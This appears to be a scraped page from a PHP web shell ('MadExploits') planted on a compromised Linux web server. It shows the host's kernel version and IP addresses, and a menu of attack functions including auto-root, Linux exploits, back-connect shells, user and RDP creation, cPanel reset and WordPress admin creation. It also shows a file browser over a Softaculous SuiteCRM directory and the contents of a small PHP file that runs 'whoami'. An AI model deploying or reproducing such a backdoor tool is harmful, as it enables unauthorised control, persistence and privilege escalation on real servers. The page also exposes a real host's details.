Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.137.214.16
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
suitecrm7 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_.htaccess
3.97
KB
-rw-r--r--
clone.php
16.44
KB
-rw-r--r--
config.php
11.58
KB
-rw-r--r--
config_override.php
132
B
-rw-r--r--
edit.php
4.68
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
extend.php
10
KB
-rw-r--r--
fileindex.php
673
B
-rw-r--r--
get_user.php
947
B
-rw-r--r--
import.php
3.33
KB
-rw-r--r--
info.xml
3.55
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
11.07
KB
-rw-r--r--
install.xml
1.12
KB
-rw-r--r--
md5
1.58
KB
-rw-r--r--
notes.txt
1.11
KB
-rw-r--r--
status.json
305
B
-rw-r--r--
update_pass.php
558
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : get_user.php
<?php @unlink('get_user.php'); function __getRunningUser(){ // works on Windows and Linux, but might return null on systems that include "exec" in // disabled_functions in php.ini (typical in shared hosting) $runningUser = exec('whoami'); if ($runningUser == null) { // matches null, false and "" if (__is_windows()) { $runningUser = getenv('USERDOMAIN').'\\'.getenv('USERNAME'); } elseif (function_exists('posix_getpwuid') && function_exists('posix_geteuid')) { $usr = posix_getpwuid(posix_geteuid()); $runningUser = $usr['name']; } } return ($runningUser == null) ? '' : $runningUser; } function __is_windows(){ static $is_windows = null; if (!isset($is_windows)) { $is_windows = strtoupper(substr(PHP_OS, 0, 3)) == 'WIN'; } return $is_windows; } $cronUser = __getRunningUser(); echo '<get_user>'.$cronUser.'</get_user>'; ?>
Close